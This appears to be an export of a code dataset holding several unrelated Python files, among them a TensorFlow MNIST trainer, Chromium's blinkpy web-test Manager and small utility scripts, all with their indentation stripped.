test_set, test_loader = data['test_set'], data['test_loader']
for i, sample in tqdm(enumerate(test_loader)):
if i > 1:
break
val_agent = Val_model_subpixel(config['subpixel'], device=device)
val_agent.loadModel()
img = sample['image']
print('image: ', img.shape)
points = paddle.to_tensor([[1, 2], [3, 4]])
def points_to_4d(points):
num_of_points = points.shape[0]
cols = paddle.to_tensor(paddle.zeros([num_of_points, 1]).requires_grad_(False), dtype=paddle.float32)
points = paddle.concat((cols, cols, paddle.to_tensor(points, dtype=paddle.float32)), axis=1)
return points
label_idx = points_to_4d(points)
patches = val_agent.extract_patches(label_idx, img)
points_res = val_agent.run(patches)
|
8,027 | d4b9403366a16dfbb12a2161a996e641b3a785a5 | # __author__: Stanley
# date: 2018/10/22
class Foo:
def __init__(self, name, age):
self.name = name
self.age = age
def __getitem__(self, item):
return item + 10
def __setitem__(self, key, value):
print(key, value)
def __delitem__(self, key):
print(key)
obj = Foo("stnley", 25)
# 自动执行obj对象的类中的__getitem__方法。555当作参数传递
result = obj[555]
print(result)
obj[111] = 444
del obj[222]
|
8,028 | 779e7cd05edfd74c8e60eaf5ce8443aea5fdaaef | #!/usr/bin/python2.7
# -*- coding: utf-8 -*-
"""
# @Time : 20-6-9 上午11:47
# @Author : zhufa
# @Software: PyCharm
"""
"""
tensorflow version must below 1.15
"""
import numpy as np
import tensorflow as tf
from tensorflow.examples.tutorials.mnist import input_data
mnist = input_data.read_data_sets("MNIST_data/", one_hot=True)
# 返回带初始值的权重变量
def weight_variable(shape, name):
initial = tf.truncated_normal(shape, stddev=0.1)
return tf.Variable(initial, name=name)
# 返回带初始值的偏置变量
def bias_variable(shape, name):
initial = tf.constant(0.1, shape=shape)
return tf.Variable(initial, name=name)
# 卷积:x为输入图像,W为卷积核,padding补0,步长为1,图像尺寸不变
def conv2d(x, W):
return tf.nn.conv2d(x, W, [1, 1, 1, 1], padding='SAME')
# 池化:
def max_pool_2x2(x):
return tf.nn.max_pool(x, [1, 2, 2, 1], [1, 2, 2, 1], padding='SAME')
# 第一层:卷积+池化
W_conv1 = weight_variable([5, 5, 1, 32], "W_conv1") # 5×5的卷积核,出入为1通道的图,输出为32,即32个卷积核
b_conv1 = bias_variable([32], "b_conv1")
x = tf.placeholder("float", (None, 784), name='input_x')
# 将x转化为28×28的图像矩阵/向量/张量,-1表示视原x的情况计算而出,最后的1表示通道,若为彩色图像则为3
reshaped_x = tf.reshape(x, [-1, 28, 28, 1])
h_conv1 = tf.nn.relu(conv2d(reshaped_x, W_conv1) + b_conv1) # 卷积后的图像尺寸不变
h_pool1 = max_pool_2x2(h_conv1) # 池化后的图像尺寸为14×14
# 第二层卷积+池化
W_conv2 = weight_variable([5, 5, 32, 64], "W_conv2")
b_conv2 = bias_variable([64], "b_conv2")
h_conv2 = tf.nn.relu(conv2d(h_pool1, W_conv2) + b_conv2) # 卷积后的图像尺寸不变
h_pool2 = max_pool_2x2(h_conv2) # 池化后的图像尺寸为7×7
# 密集连接层:1024个神经元(全连接)
W_fc1 = weight_variable([7 * 7 * 64, 1024], "W_fc1")
b_fc1 = bias_variable([1024], "b_fc1")
reshaped_h_pool2 = tf.reshape(h_pool2, [-1, 7 * 7 * 64])
h_fc1 = tf.nn.relu(tf.matmul(reshaped_h_pool2, W_fc1) + b_fc1)
# dropout
keep_prob = tf.placeholder("float", name='keep_prob')
h_fc1_drop = tf.nn.dropout(h_fc1, keep_prob)
# 输出层
W_fc2 = weight_variable([1024, 10], "W_fc2")
b_fc2 = bias_variable([10], "b_fc2")
y_conv = tf.nn.softmax(tf.matmul(h_fc1_drop, W_fc2) + b_fc2)
# 损失函数及训练模型
y_ = tf.placeholder(tf.float32, [None, 10])
cross_entropy = -tf.reduce_sum(y_ * tf.log(y_conv))
train = tf.train.AdamOptimizer(1e-4).minimize(cross_entropy)
# 准备训练,初始化所有变量
sess = tf.Session()
sess.run(tf.initialize_all_variables())
# 测试模型准确率
correct_prediction = tf.equal(tf.argmax(y_conv, 1), tf.argmax(y_, 1))
accuracy = tf.reduce_mean(tf.cast(correct_prediction, "float"))
'''设置模型保存器'''
m_saver = tf.train.Saver()
# 训练20000次,每次随机抓取100对测试样本,每100次输出当前的准确率
for i in range(10000):
batch_xs, batch_ys = mnist.train.next_batch(100)
if i % 100 == 0:
step_accuracy = accuracy.eval(session=sess,
feed_dict={x: mnist.test.images, y_: mnist.test.labels, keep_prob: 1.0})
print "step %d test accuracy: %g" % (i, step_accuracy)
sess.run(train, feed_dict={x: batch_xs, y_: batch_ys, keep_prob: 0.5})
# 保存模型参数,如何加载模型并使用参见 mnist_test.py
# m_saver.save(sess, "model/mnist-model", global_step=10000)
print "test accuracy: %g" % accuracy.eval(session=sess,
feed_dict={x: mnist.test.images, y_: mnist.test.labels, keep_prob: 1.0})
|
8,029 | 1221394dfb97cbbfb00b412f60d4df521acc1262 |
# MODULES
import sys
sys.path.append('~/Documents/Project_3/REPO')
from scipy import *
from scipy import linalg
import cPickle as pickle
import ConfigParser
import TobySpectralMethods as tsm
config = ConfigParser.RawConfigParser()
fp = open('config.cfg')
config.readfp(fp)
N = config.getint('General', 'N')
M = config.getint('General', 'M')
Re = config.getfloat('General', 'Re')
kx = config.getfloat('General', 'kx')
dt = config.getfloat('Time Iteration', 'dt')
totTime = config.getfloat('Time Iteration', 'totTime')
numFrames = config.getint('Time Iteration', 'numFrames')
fp.close()
amp = 0.025
tsm.initTSM(N_=N, M_=M, kx_=kx)
def mk_PSI_ECS_guess():
PSI = zeros(vecLen, dtype='complex')
PSI[N*M] += 2.0/3.0
PSI[N*M+1] += 3.0/4.0
PSI[N*M+2] += 0.0
PSI[N*M+3] += -1.0/12.0
# Perturb 3 of 4 of first Chebyshevs of the 1st Fourier mode
PSI[(N-1)*M] = -random.normal(loc=amp, scale=0.001)
PSI[(N-1)*M+2] = random.normal(loc=amp, scale=0.001)
PSI[(N-1)*M+4] = -0.1*random.normal(loc=amp, scale=0.001)
PSI[(N-1)*M+6] = -0.05*random.normal(loc=amp, scale=0.001)
PSI[(N+1)*M:(N+2)*M] = conjugate(PSI[(N-1)*M:N*M])
# reduce the base flow KE by a roughly corresponding amount (8pc), with this
# energy in the perturbation (hopefully). ( 0.96 is about root(0.92) )
bfReduc = 0.8
PSI[N*M:(N+1)*M] = bfReduc*PSI[N*M:(N+1)*M]
# Check to make sure energy is large enough to get an ECS
U = dot(MDY, PSI)
V = - dot(MDX, PSI)
MMU = tsm.prod_mat(U)
MMV = tsm.prod_mat(V)
Usq = dot(MMU, U) + dot(MMV, V)
Usq1 = Usq[(N-1)*M:N*M] + Usq[(N+1)*M:(N+2)*M]
Usq2 = Usq[(N-2)*M:(N-1)*M] + Usq[(N+2)*M:(N+3)*M]
KE0 = 0.5*dot(INTY, Usq[N*M:(N+1)*M])
KE1 = 0.5*dot(INTY, Usq1)
KE2 = 0.5*dot(INTY, Usq2)
print 'Kinetic energy of 0th mode is: ', KE0
print 'Kinetic energy of 1st mode is: ', KE1
print 'TOTAL: ', KE0+KE1+KE2
print 'norm of 0th mode is: ', linalg.norm(PSI[N*M:(N+1)*M], 2)
print 'norm of 1st mode is: ', linalg.norm(PSI[(N-1)*M:N*M] +
PSI[(N+1)*M:(N+2)*M], 2)
return PSI
# MAIN
vecLen = (2*N+1)*M
# Useful operators
MDY = tsm.mk_diff_y()
MDYY = dot(MDY,MDY)
MDYYY = dot(MDY,MDYY)
MDX = tsm.mk_diff_x()
MDXX = dot(MDX, MDX)
MDXY = dot(MDX, MDY)
LAPLAC = dot(MDX,MDX) + dot(MDY,MDY)
BIHARM = dot(LAPLAC, LAPLAC)
MDXLAPLAC = dot(MDX, LAPLAC)
MDYLAPLAC = dot(MDY, LAPLAC)
# single mode Operators
SMDY = tsm.mk_single_diffy()
SMDYY = dot(SMDY, SMDY)
SMDYYY = dot(SMDY, SMDYY)
INTY = tsm.mk_cheb_int()
# Identity
SII = eye(M, M, dtype='complex')
PSI = mk_PSI_ECS_guess()
pickle.dump(PSI, open('psi.init', 'w'))
|
8,030 | 177401f25471cf1cbd32dd0770acdc12bf271361 | import os
from NeuralEmulator.Configurators.NormalLeakSourceConfigurator import NormalLeakSourceConfigurator
from NeuralEmulator.Configurators.OZNeuronConfigurator import OZNeuronConfigurator
from NeuralEmulator.Configurators.PulseSynapseConfigurator import PulseSynapseConfigurator
from NeuralEmulator.NormalLeakSource import NormalLeakSource
from NeuralEmulator.OZNeuron import OZNeuron
from NeuralEmulator.Preprocessing.NegPreprocessingBlock import NegPreprocessingBlock
from NeuralEmulator.Preprocessing.PosPreprocessingBlock import PosPreprocessingBlock
from NeuralEmulator.Preprocessing.PreprocessingBlock import PreprocessingBlock
from NeuralEmulator.PulseSynapse import PulseSynapse
from NeuralEmulator.Test.SimpleVoltageSource import SimpleVoltageSource
import random
class NeuronsGenerator:
def __init__(self, neuronsNumber, synapse, lowerBound=100.0 * (10 ** -3), upperBound=800.0 * (10 ** -3), randomVals=False):
noramalLeakSourceConfigurator = NormalLeakSourceConfigurator()
ozNeuronConfigurator = OZNeuronConfigurator()
neurons = []
leaks = []
if randomVals is False:
start = upperBound
delta = (upperBound - lowerBound) / neuronsNumber
for x in range(neuronsNumber):
normalLeakSource = NormalLeakSource(SimpleVoltageSource(start), noramalLeakSourceConfigurator)
ozNeuron = OZNeuron(synapse, normalLeakSource, ozNeuronConfigurator)
leaks.append(normalLeakSource)
neurons.append(ozNeuron)
start -= delta
else:
lowerBound = int(lowerBound * (10 ** 3))
uppderBound = int(upperBound * (10 ** 3))
vals = set()
while len(vals) != neuronsNumber:
vlk = random.randint(lowerBound, uppderBound)
vals.add(vlk)
for x in range(neuronsNumber):
vlk = vals.pop()
vlk = vlk * (10 ** -3)
normalLeakSource = NormalLeakSource(SimpleVoltageSource(vlk), noramalLeakSourceConfigurator)
ozNeuron = OZNeuron(synapse, normalLeakSource, ozNeuronConfigurator)
leaks.append(normalLeakSource)
neurons.append(ozNeuron)
self.neurons = neurons
self.leaks = leaks
def getNeurons(self):
return self.neurons
def getLeaks(self):
return self.leaks
if __name__ == "__main__":
os.environ["NERUSIM_CONF"] = r"C:\Users\Avi\Desktop\IntelliSpikesLab\Emulator\config"
vin = SimpleVoltageSource()
preProcessBlock = PreprocessingBlock(vin)
vposPort = PosPreprocessingBlock(preProcessBlock)
g = NeuronsGenerator(50, vposPort, randomVals=True)
neurons = g.getNeurons()
print("sf")
|
8,031 | c2d6e4286e1b9d6dc852bde994da60d353e03e5c | from youtube_transcript_api import YouTubeTranscriptApi
transcript_list = YouTubeTranscriptApi.list_transcripts('i8pOulVUz0A')
transcript = transcript_list.find_transcript(['en'])
transcript = transcript.fetch()
with open("transcript.txt", 'w') as f:
for line in transcript:
f.write(line['text']+ '\n') |
8,032 | 18c4c1e1ee0df835895397488b270a47b1620c30 | with open('dwarfs.txt') as fh:
i = 1
for line in fh:
print("[%d] %s" % (i, line))
i += 1
|
8,033 | 08b57c00beb8dfedfee1bc032b8c281d7a151931 | # Copyright (C) 2010 Google Inc. All rights reserved.
# Copyright (C) 2010 Gabor Rapcsanyi (rgabor@inf.u-szeged.hu), University of Szeged
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""The Manager orchestrates the overall process of running web tests.
This includes finding tests to run, reading the test expectations,
starting the required helper servers, deciding the order and way to
run the tests, retrying failed tests, and collecting the test results,
including crash logs and mismatches with expectations.
The Manager object has a constructor and one main method called run.
"""
import fnmatch
import json
import logging
import os
import random
import signal
import sys
import time
from blinkpy.common import exit_codes
from blinkpy.common.path_finder import PathFinder
from blinkpy.tool import grammar
from blinkpy.web_tests.controllers.test_result_sink import CreateTestResultSink
from blinkpy.web_tests.controllers.web_test_finder import WebTestFinder
from blinkpy.web_tests.controllers.web_test_runner import WebTestRunner
from blinkpy.web_tests.layout_package import json_results_generator
from blinkpy.web_tests.models import test_expectations
from blinkpy.web_tests.models import test_failures
from blinkpy.web_tests.models import test_run_results
from blinkpy.web_tests.models.typ_types import ResultType
from blinkpy.web_tests.models.test_input import TestInput
_log = logging.getLogger(__name__)
TestExpectations = test_expectations.TestExpectations
class Manager(object):
"""A class for managing running a series of web tests."""
HTTP_SUBDIR = 'http'
PERF_SUBDIR = 'perf'
WEBSOCKET_SUBDIR = 'websocket'
ARCHIVED_RESULTS_LIMIT = 25
def __init__(self, port, options, printer):
"""Initializes test runner data structures.
Args:
port: An object implementing platform-specific functionality.
options: An options argument which contains command line options.
printer: A Printer object to record updates to.
"""
self._port = port
self._filesystem = port.host.filesystem
self._options = options
self._printer = printer
self._expectations = None
self._http_server_started = False
self._wptserve_started = False
self._websockets_server_started = False
self._results_directory = self._port.results_directory()
self._artifacts_directory = self._port.artifacts_directory()
self._finder = WebTestFinder(self._port, self._options)
self._path_finder = PathFinder(port.host.filesystem)
self._sink = CreateTestResultSink(self._port)
self._runner = WebTestRunner(self._options, self._port, self._printer,
self._results_directory,
self._test_is_slow, self._sink)
def run(self, args):
"""Runs the tests and return a RunDetails object with the results."""
start_time = time.time()
self._printer.write_update('Collecting tests ...')
running_all_tests = False
try:
paths, all_test_names, running_all_tests = self._collect_tests(
args)
except IOError:
# This is raised if --test-list doesn't exist
return test_run_results.RunDetails(
exit_code=exit_codes.NO_TESTS_EXIT_STATUS)
test_names = self._finder.split_into_chunks(all_test_names)
if self._options.order == 'natural':
test_names.sort(key=self._port.test_key)
elif self._options.order == 'random':
test_names.sort()
random.Random(self._options.seed).shuffle(test_names)
elif self._options.order == 'none':
# Restore the test order to user specified order.
# base.tests() may change the order as it returns tests in the
# real, external/wpt, virtual order.
if paths:
test_names = self._restore_order(paths, test_names)
if not self._options.no_expectations:
self._printer.write_update('Parsing expectations ...')
self._expectations = test_expectations.TestExpectations(self._port)
tests_to_run, tests_to_skip = self._prepare_lists(paths, test_names)
self._printer.print_found(
len(all_test_names), len(test_names), len(tests_to_run),
self._options.repeat_each, self._options.iterations)
# Check to make sure we're not skipping every test.
if not tests_to_run:
msg = 'No tests to run.'
if self._options.zero_tests_executed_ok:
_log.info(msg)
# Keep executing to produce valid (but empty) results.
else:
_log.critical(msg)
code = exit_codes.NO_TESTS_EXIT_STATUS
return test_run_results.RunDetails(exit_code=code)
exit_code = self._set_up_run(tests_to_run)
if exit_code:
return test_run_results.RunDetails(exit_code=exit_code)
if self._options.num_retries is None:
# If --test-list is passed, or if no test narrowing is specified,
# default to 3 retries. Otherwise [e.g. if tests are being passed by
# name], default to 0 retries.
if self._options.test_list or len(paths) < len(test_names):
self._options.num_retries = 3
else:
self._options.num_retries = 0
should_retry_failures = self._options.num_retries > 0
try:
self._register_termination_handler()
self._start_servers(tests_to_run)
if self._options.watch:
run_results = self._run_test_loop(tests_to_run, tests_to_skip)
else:
run_results = self._run_test_once(tests_to_run, tests_to_skip,
should_retry_failures)
initial_results, all_retry_results = run_results
finally:
_log.info("Finally stop servers and clean up")
self._stop_servers()
self._clean_up_run()
if self._options.no_expectations:
return test_run_results.RunDetails(0, [], [], initial_results,
all_retry_results)
# Some crash logs can take a long time to be written out so look
# for new logs after the test run finishes.
self._printer.write_update('Looking for new crash logs ...')
self._look_for_new_crash_logs(initial_results, start_time)
for retry_attempt_results in all_retry_results:
self._look_for_new_crash_logs(retry_attempt_results, start_time)
self._printer.write_update('Summarizing results ...')
summarized_full_results = test_run_results.summarize_results(
self._port, self._options, self._expectations, initial_results,
all_retry_results)
summarized_failing_results = test_run_results.summarize_results(
self._port,
self._options,
self._expectations,
initial_results,
all_retry_results,
only_include_failing=True)
run_histories = test_run_results.test_run_histories(
self._options, self._expectations, initial_results,
all_retry_results)
exit_code = summarized_failing_results['num_regressions']
if exit_code > exit_codes.MAX_FAILURES_EXIT_STATUS:
_log.warning('num regressions (%d) exceeds max exit status (%d)',
exit_code, exit_codes.MAX_FAILURES_EXIT_STATUS)
exit_code = exit_codes.MAX_FAILURES_EXIT_STATUS
if not self._options.dry_run:
self._write_json_files(summarized_full_results,
summarized_failing_results, initial_results,
running_all_tests, run_histories)
self._copy_results_html_file(self._artifacts_directory,
'results.html')
if (initial_results.interrupt_reason is
test_run_results.InterruptReason.EXTERNAL_SIGNAL):
exit_code = exit_codes.INTERRUPTED_EXIT_STATUS
else:
if initial_results.interrupted:
exit_code = exit_codes.EARLY_EXIT_STATUS
if (self._options.show_results
and (exit_code or initial_results.total_failures)):
self._port.show_results_html_file(
self._filesystem.join(self._artifacts_directory,
'results.html'))
self._printer.print_results(time.time() - start_time,
initial_results)
return test_run_results.RunDetails(exit_code, summarized_full_results,
summarized_failing_results,
initial_results, all_retry_results)
def _register_termination_handler(self):
if self._port.host.platform.is_win():
signum = signal.SIGBREAK
else:
signum = signal.SIGTERM
signal.signal(signum, self._on_termination)
def _on_termination(self, signum, _frame):
self._printer.write_update(
'Received signal "%s" (%d) in %d' %
(signal.strsignal(signum), signum, os.getpid()))
raise KeyboardInterrupt
def _run_test_loop(self, tests_to_run, tests_to_skip):
# Don't show results in a new browser window because we're already
# printing the link to diffs in the loop
self._options.show_results = False
while True:
initial_results, all_retry_results = self._run_test_once(
tests_to_run, tests_to_skip, should_retry_failures=False)
for name in initial_results.failures_by_name:
failure = initial_results.failures_by_name[name][0]
if isinstance(failure, test_failures.FailureTextMismatch):
full_test_path = self._filesystem.join(
self._artifacts_directory, name)
filename, _ = self._filesystem.splitext(full_test_path)
pretty_diff_path = 'file://' + filename + '-pretty-diff.html'
self._printer.writeln('Link to pretty diff:')
self._printer.writeln(pretty_diff_path + '\n')
self._printer.writeln('Finished running tests')
user_input = self._port.host.user.prompt(
'Interactive watch mode: (q)uit (r)etry\n').lower()
if user_input == 'q' or user_input == 'quit':
return (initial_results, all_retry_results)
def _run_test_once(self, tests_to_run, tests_to_skip,
should_retry_failures):
num_workers = int(
self._port.num_workers(int(self._options.child_processes)))
initial_results = self._run_tests(
tests_to_run, tests_to_skip, self._options.repeat_each,
self._options.iterations, num_workers)
# Don't retry failures when interrupted by user or failures limit exception.
should_retry_failures = (should_retry_failures
and not initial_results.interrupted)
tests_to_retry = self._tests_to_retry(initial_results)
all_retry_results = []
if should_retry_failures and tests_to_retry:
for retry_attempt in range(1, self._options.num_retries + 1):
if not tests_to_retry:
break
_log.info('')
_log.info(
'Retrying %s, attempt %d of %d...',
grammar.pluralize('unexpected failure',
len(tests_to_retry)), retry_attempt,
self._options.num_retries)
retry_results = self._run_tests(
tests_to_retry,
tests_to_skip=set(),
repeat_each=1,
iterations=1,
num_workers=num_workers,
retry_attempt=retry_attempt)
all_retry_results.append(retry_results)
tests_to_retry = self._tests_to_retry(retry_results)
return (initial_results, all_retry_results)
def _restore_order(self, paths, test_names):
original_test_names = list(test_names)
test_names = []
for path in paths:
for test in original_test_names:
if test.startswith(path) or fnmatch.fnmatch(test, path):
test_names.append(test)
test_names += list(set(original_test_names) - set(test_names))
return test_names
def _collect_tests(self, args):
return self._finder.find_tests(
args,
test_lists=self._options.test_list,
filter_files=self._options.isolated_script_test_filter_file,
fastest_percentile=self._options.fastest,
filters=self._options.isolated_script_test_filter)
def _is_http_test(self, test):
return (
test.startswith(self.HTTP_SUBDIR + self._port.TEST_PATH_SEPARATOR)
or self._is_websocket_test(test) or self._port.TEST_PATH_SEPARATOR
+ self.HTTP_SUBDIR + self._port.TEST_PATH_SEPARATOR in test)
def _is_websocket_test(self, test):
if self._port.should_use_wptserve(test):
return False
return self.WEBSOCKET_SUBDIR + self._port.TEST_PATH_SEPARATOR in test
def _http_tests(self, test_names):
return set(test for test in test_names if self._is_http_test(test))
def _is_perf_test(self, test):
return (self.PERF_SUBDIR == test
or (self.PERF_SUBDIR + self._port.TEST_PATH_SEPARATOR) in test)
def _prepare_lists(self, paths, test_names):
tests_to_skip = self._finder.skip_tests(paths, test_names,
self._expectations)
tests_to_run = [
test for test in test_names if test not in tests_to_skip
]
return tests_to_run, tests_to_skip
def _test_input_for_file(self, test_file, retry_attempt):
return TestInput(
test_file,
self._options.slow_timeout_ms
if self._test_is_slow(test_file) else self._options.timeout_ms,
self._test_requires_lock(test_file),
retry_attempt=retry_attempt)
def _test_requires_lock(self, test_file):
"""Returns True if the test needs to be locked when running multiple
instances of this test runner.
Perf tests are locked because heavy load caused by running other
tests in parallel might cause some of them to time out.
"""
return self._is_perf_test(test_file)
def _test_is_slow(self, test_file):
if not self._expectations:
return False
is_slow_test = self._expectations.get_expectations(
test_file).is_slow_test
return is_slow_test or self._port.is_slow_wpt_test(test_file)
def _needs_servers(self, test_names):
return any(
self._is_http_test(test_name) for test_name in test_names)
def _set_up_run(self, test_names):
self._printer.write_update('Checking build ...')
if self._options.build:
exit_code = self._port.check_build(
self._needs_servers(test_names), self._printer)
if exit_code:
_log.error('Build check failed')
return exit_code
if self._options.clobber_old_results:
self._port.clobber_old_results()
elif self._filesystem.exists(self._artifacts_directory):
self._port.limit_archived_results_count()
# Rename the existing results folder for archiving.
self._port.rename_results_folder()
# Create the output directory if it doesn't already exist.
self._port.host.filesystem.maybe_make_directory(
self._artifacts_directory)
exit_code = self._port.setup_test_run()
if exit_code:
_log.error('Build setup failed')
return exit_code
# Check that the system dependencies (themes, fonts, ...) are correct.
if not self._options.nocheck_sys_deps:
self._printer.write_update('Checking system dependencies ...')
exit_code = self._port.check_sys_deps()
if exit_code:
return exit_code
return exit_codes.OK_EXIT_STATUS
def _run_tests(self,
tests_to_run,
tests_to_skip,
repeat_each,
iterations,
num_workers,
retry_attempt=0):
test_inputs = []
for _ in range(iterations):
for test in tests_to_run:
for _ in range(repeat_each):
test_inputs.append(
self._test_input_for_file(test, retry_attempt))
return self._runner.run_tests(self._expectations, test_inputs,
tests_to_skip, num_workers,
retry_attempt)
def _start_servers(self, tests_to_run):
if any(self._port.is_wpt_test(test) for test in tests_to_run):
self._printer.write_update('Starting WPTServe ...')
self._port.start_wptserve()
self._wptserve_started = True
if (self._port.requires_http_server()
or any(self._is_http_test(test) for test in tests_to_run)):
self._printer.write_update('Starting HTTP server ...')
self._port.start_http_server(
additional_dirs={},
number_of_drivers=self._options.max_locked_shards)
self._http_server_started = True
if any(self._is_websocket_test(test) for test in tests_to_run):
self._printer.write_update('Starting WebSocket server ...')
self._port.start_websocket_server()
self._websockets_server_started = True
def _stop_servers(self):
if self._wptserve_started:
self._printer.write_update('Stopping WPTServe ...')
self._wptserve_started = False
self._port.stop_wptserve()
if self._http_server_started:
self._printer.write_update('Stopping HTTP server ...')
self._http_server_started = False
self._port.stop_http_server()
if self._websockets_server_started:
self._printer.write_update('Stopping WebSocket server ...')
self._websockets_server_started = False
self._port.stop_websocket_server()
def _clean_up_run(self):
_log.debug('Flushing stdout')
sys.stdout.flush()
_log.debug('Flushing stderr')
sys.stderr.flush()
_log.debug('Cleaning up port')
self._port.clean_up_test_run()
if self._sink:
_log.debug('Closing sink')
self._sink.close()
def _look_for_new_crash_logs(self, run_results, start_time):
"""Looks for and writes new crash logs, at the end of the test run.
Since crash logs can take a long time to be written out if the system is
under stress, do a second pass at the end of the test run.
Args:
run_results: The results of the test run.
start_time: Time the tests started at. We're looking for crash
logs after that time.
"""
crashed_processes = []
test_to_crash_failure = {}
# reset static variables for Failure type classes
test_failures.AbstractTestResultType.port = self._port
test_failures.AbstractTestResultType.result_directory = self._results_directory
test_failures.AbstractTestResultType.filesystem = self._filesystem
for test, result in run_results.unexpected_results_by_name.items():
if result.type != ResultType.Crash:
continue
for failure in result.failures:
if (not isinstance(failure, test_failures.FailureCrash)
or failure.has_log):
continue
crashed_processes.append(
[test, failure.process_name, failure.pid])
test_to_crash_failure[test] = failure
sample_files = self._port.look_for_new_samples(crashed_processes,
start_time) or {}
for test, sample_file in sample_files.items():
test_failures.AbstractTestResultType.test_name = test
test_result = run_results.unexpected_results_by_name[test]
artifact_relative_path = self._port.output_filename(
test, test_failures.FILENAME_SUFFIX_SAMPLE, '.txt')
artifacts_sub_dir = test_result.artifacts.ArtifactsSubDirectory()
artifact_abspath = self._filesystem.join(self._results_directory,
artifacts_sub_dir,
artifact_relative_path)
self._filesystem.maybe_make_directory(
self._filesystem.dirname(artifact_abspath))
self._filesystem.copyfile(sample_file, artifact_abspath)
test_result.artifacts.AddArtifact(
'sample_file',
self._filesystem.join(artifacts_sub_dir,
artifact_relative_path))
new_crash_logs = self._port.look_for_new_crash_logs(
crashed_processes, start_time) or {}
for test, (crash_log, crash_site) in new_crash_logs.items():
test_failures.AbstractTestResultType.test_name = test
failure.crash_log = crash_log
failure.has_log = self._port.output_contains_sanitizer_messages(
failure.crash_log)
test_result = run_results.unexpected_results_by_name[test]
test_result.crash_site = crash_site
test_to_crash_failure[test].create_artifacts(
test_result.artifacts, force_overwrite=True)
def _tests_to_retry(self, run_results):
# TODO(ojan): This should also check that result.type != test_expectations.MISSING
# since retrying missing expectations is silly. But that's a bit tricky since we
# only consider the last retry attempt for the count of unexpected regressions.
return [
result.test_name
for result in run_results.unexpected_results_by_name.values()
if result.type != ResultType.Pass
]
def _write_json_files(self, summarized_full_results,
summarized_failing_results, initial_results,
running_all_tests, run_histories):
_log.debug("Writing JSON files in %s.", self._artifacts_directory)
# FIXME: Upload stats.json to the server and delete times_ms.
times_trie = json_results_generator.test_timings_trie(
initial_results.results_by_name.values())
times_json_path = self._filesystem.join(self._artifacts_directory,
'times_ms.json')
json_results_generator.write_json(self._filesystem, times_trie,
times_json_path)
# Save out the times data so we can use it for --fastest in the future.
if running_all_tests:
bot_test_times_path = self._port.bot_test_times_path()
self._filesystem.maybe_make_directory(
self._filesystem.dirname(bot_test_times_path))
json_results_generator.write_json(self._filesystem, times_trie,
bot_test_times_path)
stats_trie = self._stats_trie(initial_results)
stats_path = self._filesystem.join(self._artifacts_directory,
'stats.json')
self._filesystem.write_text_file(stats_path, json.dumps(stats_trie))
full_results_path = self._filesystem.join(self._artifacts_directory,
'full_results.json')
json_results_generator.write_json(
self._filesystem, summarized_full_results, full_results_path)
full_results_jsonp_path = self._filesystem.join(
self._artifacts_directory, 'full_results_jsonp.js')
json_results_generator.write_json(
self._filesystem,
summarized_full_results,
full_results_jsonp_path,
callback='ADD_FULL_RESULTS')
failing_results_path = self._filesystem.join(self._artifacts_directory,
'failing_results.json')
# We write failing_results.json out as jsonp because we need to load it
# from a file url for results.html and Chromium doesn't allow that.
json_results_generator.write_json(
self._filesystem,
summarized_failing_results,
failing_results_path,
callback='ADD_RESULTS')
if self._options.json_test_results:
json_results_generator.write_json(self._filesystem,
summarized_full_results,
self._options.json_test_results)
if self._options.write_run_histories_to:
json_results_generator.write_json(
self._filesystem, run_histories,
self._options.write_run_histories_to)
_log.debug('Finished writing JSON files.')
def _copy_results_html_file(self, destination_dir, filename):
"""Copies a file from the template directory to the results directory."""
files_to_copy = [filename, filename + ".version"]
template_dir = self._path_finder.path_from_blink_tools(
'blinkpy', 'web_tests')
for filename in files_to_copy:
source_path = self._filesystem.join(template_dir, filename)
destination_path = self._filesystem.join(destination_dir, filename)
# Note that the results.html template file won't exist when
# we're using a MockFileSystem during unit tests, so make sure
# it exists before we try to copy it.
if self._filesystem.exists(source_path):
self._filesystem.copyfile(source_path, destination_path)
def _stats_trie(self, initial_results):
def _worker_number(worker_name):
return int(worker_name.split('/')[1]) if worker_name else -1
stats = {}
for result in initial_results.results_by_name.values():
if result.type != ResultType.Skip:
stats[result.test_name] = {
'results': (_worker_number(result.worker_name),
result.test_number, result.pid,
int(result.test_run_time * 1000),
int(result.total_run_time * 1000))
}
stats_trie = {}
for name, value in stats.items():
json_results_generator.add_path_to_trie(name, value, stats_trie)
return stats_trie
|
8,034 | 40e2b695d8aaaa82cb90694b85d12061b4e6eca8 | import matplotlib.pyplot as plt
x_int = list(range(1, 5001))
y_int = [i**3 for i in x_int]
plt.scatter(x_int, y_int, c=y_int, cmap=plt.cm.Blues, s=40)
plt.show()
|
8,035 | 8d48b5b831edb62b2d9624bc23cae45d390fd224 | # pylint: disable=C0103, C0413, E1101, W0611
"""Covid Catcher Backend"""
import os
from os.path import join, dirname
import json
import requests
import flask
from flask import request
import flask_sqlalchemy
import flask_socketio
from dotenv import load_dotenv
from covid import get_covid_stats_by_state
from covid import get_covid_stats_by_county
from covid import get_covid_stats_for_all_states
from faq import get_all_questions
from faq import get_all_categories
from faq import FAQ
import news
from news import get_news
import location
from location import get_location
import sites
from sites import get_sites
from sites import search_user
from sites import TestingSites
